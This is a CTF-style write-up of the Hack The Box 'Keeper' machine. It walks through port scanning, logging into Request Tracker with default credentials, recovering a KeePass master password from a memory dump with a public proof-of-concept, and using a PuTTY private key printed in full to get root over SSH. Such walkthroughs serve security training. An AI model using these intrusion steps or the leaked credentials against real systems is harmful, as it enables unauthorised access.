# Keeper

## Nmap Scan

```
$ nmap -sC -sV -Pn -oN nmap 10.10.11.227                     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 09:14 +08
Nmap scan report for 10.10.11.227
Host is up (0.0067s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
|_  256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.84 seconds
```

## Initial Access

### Port 80

There is a website hosted on port 80. They only tell us to visit this webpage to raise an IT support ticket.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FMERwkE2gs0VGPXyKBGva%2Fimage.png?alt=media&#x26;token=8653b05b-6114-4c70-8f3e-f9b5d7f40f25" alt=""><figcaption></figcaption></figure>

So I added `tickets.keeper.htb` into the host file.

```
$ echo "10.10.11.227 tickets.keeper.htb" | sudo tee -a /etc/hosts 
[sudo] password for ranay: 
10.10.11.227 tickets.keeper.htb
                                                                                                                                                                                                                  
┌──(ranay㉿kali)-[~/Desktop/hackthebox/boxes/keeper]
└─$ cat /etc/hosts                                                    
...
10.10.11.227 tickets.keeper.htb
```

After adding to the host file, I visited the website and it shows me this.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FTBbNy7fn5I5YX1TdZhtm%2Fimage.png?alt=media&#x26;token=353d1d2f-e4c3-4015-b759-c94ae206a870" alt=""><figcaption></figcaption></figure>

From the top right I can see that it is a Request Tracker and since this is a login page, I searched up for default credentials if there are any. After searching, there are default credentials for this software.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FBuoMfcjTk8F3ThxBWtJf%2Fimage.png?alt=media&#x26;token=01c4731b-7d98-4d9d-92de-85d6918afb85" alt=""><figcaption></figcaption></figure>

After trying the default username and password, I am able to login.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2F9rgCaGUn2X8Ela4KjOH9%2Fimage.png?alt=media&#x26;token=5eac8814-6c76-43d0-9687-04ae2de1a3e3" alt=""><figcaption></figcaption></figure>

I will then go to the `User` tab under `Admin` to see if there is any other users.

From here, I can see there is another user called `Inorgaard`.&#x20;

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FKFMQg99wFNvxufICei76%2Fimage.png?alt=media&#x26;token=61f8e07b-5f45-4837-ae7d-95e6430f2a89" alt=""><figcaption></figcaption></figure>

If I click into it, we can see that the password for the user `lnorgaard` is `Welcome2023!`

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FPdAKwWHwYz9iBDYA268t%2Fimage.png?alt=media&#x26;token=5399dd46-a269-4e3e-afed-c28a8e442643" alt=""><figcaption></figcaption></figure>

After trying the credentials, I am able to login into the system as `lnorgaard`.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2Fb96dlmrcfJRNTfppQWXI%2Fimage.png?alt=media&#x26;token=fef4dd7c-b0e3-4262-aea3-e3ac1f2e9531" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### KeePass dump

When I check the local directory, I can see that there is a `RT30000.zip` folder.

```bash
lnorgaard@keeper:~$ ls
RT30000.zip  user.txt
```

I will then unzip the file to see what is the content of the zip.

```bash
lnorgaard@keeper:~$ unzip RT30000.zip 
Archive:  RT30000.zip
  inflating: KeePassDumpFull.dmp     
 extracting: passcodes.kdbx          
lnorgaard@keeper:~$ ls
KeePassDumpFull.dmp  passcodes.kdbx  RT30000.zip  user.txt
lnorgaard@keeper:~$ 
```

The zip file contains the `KeePassDumpFull.dmp` and `passcodes.kdbx`. I will then extract out `passcodes.kdbx`.

```
$ scp lnorgaard@10.10.11.227:/home/lnorgaard/passcodes.kdbx ./passcodes.kdbx 
lnorgaard@10.10.11.227's password: 
passcodes.kdbx                                                                                                                                                                  100% 3630   312.5KB/s   00:00    
```

However, when I tried to crack the password, it does not seems successful.

After searching online to see if there any uses for the `KeePassDumpFull.dmp` file, I can see that maybe we can get the master key password from the dump file instead.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FdG16sGY73h7EwBLOSxzv%2Fimage.png?alt=media&#x26;token=c19fef2e-6dd6-4011-b835-4dab504e9678" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/matro7sh/keepass-dump-masterkey>" %}

After moving the dump file into the same folder as the poc script, I will run the script. However, there are multiple possible password.

```
$ python poc.py -d KeePassDumpFull.dmp 
2024-05-27 09:53:34,145 [.] [main] Opened KeePassDumpFull.dmp
Possible password: ●,dgr●d med fl●de
Possible password: ●ldgr●d med fl●de
Possible password: ●`dgr●d med fl●de
Possible password: ●-dgr●d med fl●de
Possible password: ●'dgr●d med fl●de
Possible password: ●]dgr●d med fl●de
Possible password: ●Adgr●d med fl●de
Possible password: ●Idgr●d med fl●de
Possible password: ●:dgr●d med fl●de
Possible password: ●=dgr●d med fl●de
Possible password: ●_dgr●d med fl●de
Possible password: ●cdgr●d med fl●de
Possible password: ●Mdgr●d med fl●de
```

However, there is a slight issue, this does not make sense. So i went to copy `●ldgr●d med fl●de` into google and this is what i was returned.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FX9DYtzrsK9kgyV3A83dZ%2Fimage.png?alt=media&#x26;token=810be62c-ae0d-4b6c-bf1d-62c78ad7fa8e" alt=""><figcaption></figcaption></figure>

So the possible password could be this: `rødgrød med fløde`

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FvSJN5YL8aJ9nZ6bwI4ak%2Fimage.png?alt=media&#x26;token=588efe8d-ee02-48a0-9c56-756382beb340" alt=""><figcaption></figcaption></figure>

So I tried enter that as the master password for the keepass file

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FGwMTXkEyn3PO4rbJYhSl%2Fimage.png?alt=media&#x26;token=ff7a5ecd-3340-4c77-87d0-dfe1f87dc29b" alt=""><figcaption></figcaption></figure>

Sure enough, it works

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FYk1JwxdYcpDaYzf2lXOF%2Fimage.png?alt=media&#x26;token=719bb0c3-8a84-4166-b4c5-c0c9e6a25265" alt=""><figcaption></figcaption></figure>

### Puttygen convert to openssh key

After clicking on `root`, we can see that there is a private key being inserted into the notes section.

```
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih
kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY
f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT
VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz
UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs
OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz
in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r
SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV
09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa
xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA
AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD
AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0
```

{% embed url="<https://www.tbs-certificates.co.uk/FAQ/en/putty-ppk-vers-openssl-openssh.html>" %}

I need to use `puttygen` to generate the private key. After which, I am able to login as root.

```
$ puttygen putty.ppk -O private-openssh -o my.key
                                                                             
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -i my.key root@10.10.11.227
The authenticity of host '10.10.11.227 (10.10.11.227)' can't be established.
ED25519 key fingerprint is SHA256:hczMXffNW5M3qOppqsTCzstpLKxrvdBjFYoJXJGpr7w.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.227' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

You have new mail.
Last login: Tue Aug  8 19:00:06 2023 from 10.10.14.41
root@keeper:~# 
```